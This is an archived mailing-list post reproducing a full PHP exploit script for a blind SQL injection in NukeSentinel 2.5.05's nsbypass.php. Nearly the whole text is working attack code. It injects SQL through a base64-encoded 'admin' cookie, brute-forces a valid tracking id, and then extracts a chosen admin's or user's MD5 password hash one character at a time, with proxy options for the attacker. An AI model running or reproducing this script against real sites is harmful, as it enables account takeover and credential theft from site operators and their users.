<<< Date Index >>>     <<< Thread Index >>>

NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit



#!/usr/bin/php
<?php
/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

# (changes.txt)
#
# 2.5.05 CHANGES (2007-01-22):
# + Includes IP2Country 2007-01-19 updated imports.
#   - Both data and sql versions. (Not in upgrade package)
# + Moved nsbypass.php into the includes directory (Per User Requests).
#
# Prior versions may also be vulnerable but this exploit will not work
# for these versions (because the file 'nsbypass.php' is not into the
# includes directory).
#

if($argc < 5) {
print("
  NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
------------------------------------------------------------------
PHP conditions: none
CMS conditions: disable_switch<=0 (module activated), track_active=1
       Credits: DarkFig <gmdarkfig@xxxxxxxxx>
           URL: http://www.acid-root.new.fr/
    Support us: Just click once on our publicity ;)
------------------------------------------------------------------
  Usage: $argv[0] -url <url> -victim <username> [Opts]
Options: -isadmin   Is the victim an Admin (1) or a normal user (default=0) ?
         -prefix    Table prefix (default=nuke)
         -tid       If you have already used this sploit
         -bf        You can precise how many hits we can try
         -proxy     If you wanna use a proxy <proxyhost:proxyport> 
         -proxyauth Basic authentification <proxyuser:proxypwd> 
------------------------------------------------------------------
"); exit(1);
}

$url   = getparam('url',1);                                          # 
http://localhost/php-nuke-7.9/html/
$login = getparam('victim',1);                           # Default   # Victim 
(root for example)
$admin = (getparam('isadmin')!='') ? getparam('isadmin') : 0;
$prfix = (getparam('prefix')!='')  ? getparam('prefix')  : 'nuke';
$tid   = (getparam('tid')!='')     ? getparam('tid')     : 0;
$nbtst = (getparam('bf')!='')      ? getparam('bf')      : 10000;
$proxy = getparam('proxy');
$authp = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

# +nukesentinel.php
# 49.  if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND 
!is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, 
`username`, `date`, `ip_addr`, `ip_long`, `page`,
#                     `user_agent`, `refered_from`, `x_forward_for`, 
`client_ip`, `remote_addr`, `remote_port`, `request_method`,
#                     `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', 
'$ban_username2', '".$nsnst_const['ban_time']."', 
#                     '".$nsnst_const['remote_ip']."', 
'".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
#                     '".$nsnst_const['forward_ip']."', 
'".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
#                     '".$nsnst_const['remote_port']."', 
'".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
print "\nInserting a row in ${prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP","255.255.255.255");
$xpl->get($url.'index.php');


# Trying to find a valid tid.
# Needed for $tum > 0.
#
print "\nTrying to find a valid tid (max hits=$nbtst)";
$sql = "' OR 1=1#";
$xpl->addcookie("admin",urlencode(base64_encode($sql.':1:')));
for($c=$tid;$c<=$nbtst;$c++)
{
    $xpl->get($url."includes/nsbypass.php?tid=$c");
    if(!preg_match("#phpnuke.org#",$xpl->getheader()))
    {
        $tid = $c;
        print "\nValid tid found: $tid\nHash: $login -> ";
        break;
    }
    if($c == $nbtst) exit("\n#1 Exploit failed");
}


# MD5 hash length [32]
#
for($a=1;$a<=32;$a++)
{
        # MD5 charset [a-f0-9]
        #
        for($b=48;$b<=71;$b++)
        {
                # +nsbypass.php
                # 24. $num = $db->sql_numrows($db->sql_query("SELECT * FROM 
".$prefix."_authors WHERE `aid`='$a_aid' AND `pwd`='$a_pas'"));
                # 25. $tum = $db->sql_numrows($db->sql_query("SELECT * FROM 
".$prefix."_nsnst_tracked_ips WHERE `tid`='$tid'"));
                # 
                if($admin) $sql = "$login' AND SUBSTR(pwd,$a,1)=CHAR($b)#";
                else       $sql = "' OR SUBSTR((SELECT user_password FROM 
${prfix}_users WHERE username='$login'),$a,1)=CHAR($b)#";
                
                # +nsbypass.php
                # 16. $tid = intval($tid);
                # 17. if(isset($_COOKIE['admin']) && !empty($_COOKIE['admin'])) 
{
                # 18. $abadmin = base64_decode($_COOKIE['admin']);
                # 19. $abadmin = explode(":", $abadmin);
                # 20. $a_aid = "$abadmin[0]";
                # 21. $a_pas = "$abadmin[1]";
                # 22. }
                #
                $xpl->addcookie("admin",urlencode(base64_encode($sql.':1:')));
                $xpl->get($url."includes/nsbypass.php?tid=$tid");

                # +nsbypass.php
                # 27. if($num > 0 AND $tum > 0) {
                # 28. $row = $db->sql_fetchrow($db->sql_query("SELECT * FROM 
".$prefix."_nsnst_tracked_ips WHERE `tid`='$tid'"));
                # 29. $row['refered_from'] = 
html_entity_decode($row['refered_from'], ENT_QUOTES);
                # 30. header("Location: ".$row['refered_from']);
                # 31. } else {
                # 32. header("Location: ".$nuke_config['nukeurl']);
                # 33. }
                #
                if(!preg_match("#phpnuke.org#",$xpl->getheader()))
                {
                        print strtolower(chr($b));
                        break;
                }
                
                # MD5 hash do not contains g (char(71)) ... WTF !?
                #
                if($b == 71) exit("\n#2 Exploit failed");
        }
}


# -url "http://www.victim.com/";
# -url http://www.victim.com/
# getparam('url',1)
#
function getparam($param,$opt='')
{
        global $argv;
        foreach($argv as $value => $key)
        {
                if($key == '-'.$param) return $argv[$value+1];
        }
        if($opt) exit("\n#3 -$param parameter required");
        else return;
}

?>